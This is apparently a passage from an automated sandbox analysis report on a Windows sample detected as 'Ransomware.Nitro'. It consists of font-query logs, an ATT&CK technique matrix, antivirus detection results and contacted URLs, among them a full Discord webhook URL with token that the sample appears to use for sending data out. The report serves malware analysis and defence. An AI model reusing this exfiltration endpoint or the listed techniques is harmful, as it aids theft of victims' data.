            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\12057ad2.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts1
            Windows Management Instrumentation            		1
            Registry Run Keys / Startup Folder            		11
            Process Injection            		1
            Masquerading            		1
            Input Capture            		111
            Security Software Discovery            		Remote Services1
            Input Capture            		Exfiltration Over Other Network Medium11
            Encrypted Channel            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Registry Run Keys / Startup Folder            		1
            Disable or Modify Tools            		LSASS Memory1
            Process Discovery            		Remote Desktop Protocol11
            Archive Collected Data            		Exfiltration Over Bluetooth1
            Ingress Tool Transfer            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
            Virtualization/Sandbox Evasion            		Security Account Manager31
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
            Non-Application Layer Protocol            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput CaptureScheduled Transfer4
            Application Layer Protocol            		SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            Remote System Discovery            		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            Obfuscated Files or Information            		Cached Domain Credentials1
            System Network Configuration Discovery            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items1
            Timestomp            		DCSync1
            File and Directory Discovery            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem22
            System Information Discovery            		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            12057ad2.exe92%ReversingLabsByteCode-MSIL.Ransomware.Nitro
            12057ad2.exe62%VirustotalBrowse
            12057ad2.exe54%MetadefenderBrowse
            12057ad2.exe100%AviraHEUR/AGEN.1232324
            12057ad2.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\12057ad2.exe100%AviraHEUR/AGEN.1232324
            C:\Users\user\AppData\Local\Temp\12057ad2.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\12057ad2.exe92%ReversingLabsByteCode-MSIL.Ransomware.Nitro
            C:\Users\user\AppData\Local\Temp\12057ad2.exe54%MetadefenderBrowse

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            0.0.12057ad2.exe.c60000.0.unpack100%AviraHEUR/AGEN.1232324Download File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            https://discord.com/api/v8/entitlements/gift-codes/0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            https://canary.discord.com/api/webhooks/1004011365263998976/a2AGTiGqW4Slobe2Bq9uW3XtAqYfaz6vmF6N5qjD0%Avira URL Cloudsafe
            https://canary.discord.com4zkd0%Avira URL Cloudsafe
            https://canary.discord.com/api/webhooks/1004011365263998976/a2AGTiGqW4Slobe2Bq9uW3XtAqYfaz6vmF6N5qjD0tSb8Mxr_xKkfGVtlH8n2bvzuN040%Avira URL Cloudsafe
            https://canary.discord.com0%Avira URL Cloudsafe
            http://canary.discord.com0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            api.ipify.org.herokudns.com
            		54.91.59.199
            		truefalse
              		unknown
              canary.discord.com
              		162.159.138.232
              		truefalse
                		unknown
                api.ipify.org
                		unknown
                		unknownfalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://api.ipify.org/false
                    		high
                    https://canary.discord.com/api/webhooks/1004011365263998976/a2AGTiGqW4Slobe2Bq9uW3XtAqYfaz6vmF6N5qjD0tSb8Mxr_xKkfGVtlH8n2bvzuN04false
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://canary.discord.com/api/webhooks/1004011365263998976/a2AGTiGqW4Slobe2Bq9uW3XtAqYfaz6vmF6N5qjD12057ad2.exe, 12057ad2.exe.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.012057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.fontbureau.com12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.fontbureau.com/designersG12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.fontbureau.com/designers/?12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.founder.com.cn/cn/bThe12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://canary.discord.com12057ad2.exe, 00000000.00000002.579820398.000000000348D000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://canary.discord.com4zkd12057ad2.exe, 00000000.00000002.579820398.000000000348D000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.fontbureau.com/designers?12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.tiro.com12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.goodfont.co.kr12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://discord.com/api/v8/entitlements/gift-codes/12057ad2.exe, 12057ad2.exe.0.drfalse
                                • URL Reputation: safe
                                		unknown
                                http://canary.discord.com12057ad2.exe, 00000000.00000002.579820398.000000000348D000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.carterandcone.coml12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.sajatypeworks.com12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.typography.netD12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers/cabarga.htmlN12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/cThe12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/staff/dennis.htm12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://api.ipify.org12057ad2.exe, 12057ad2.exe.0.drfalse
                                    		high
                                    http://fontfabrik.com12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.founder.com.cn/cn12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/frere-user.html12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.jiyu-kobo.co.jp/12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.galapagosdesign.com/DPlease12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://i.ibb.co/0frTD92/discord-avatar-512.png12057ad2.exe, 12057ad2.exe.0.drfalse
                                        		high
                                        http://www.fontbureau.com/designers812057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.fonts.com12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.sandoll.co.kr12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.urwpp.deDPlease12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.zhongyicts.com.cn12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name12057ad2.exe, 00000000.00000002.574630053.0000000002FB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.sakkal.com12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
